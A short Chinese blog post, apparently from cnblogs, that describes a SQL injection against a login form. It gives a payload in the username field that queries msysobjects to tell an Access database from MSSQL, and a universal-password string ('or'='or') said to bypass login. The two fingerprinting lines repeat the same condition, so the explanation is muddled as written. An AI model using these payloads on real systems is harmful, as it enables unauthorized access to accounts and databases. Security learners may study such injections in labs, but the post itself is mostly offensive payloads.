判断Access与mssql数据库

构造payload:

username=123123'+and+(select+count(*)+from+msysobjects)>0+and+'a'='a--

通过and (select count(*)+from msysobjects)>0 进行判断

and (select count(*)+from msysobjects)>0 :返回权限不足为Access数据库
and (select count(*)+from msysobjects)>0 :返回正常则为MSSQL数据库

通过SQL注入漏洞,使用万能密码(‘or’=’or’)成功登陆

posted @   怀光  阅读(78)  评论(0编辑  收藏  举报
努力加载评论中...
点击右上角即可分享
微信分享提示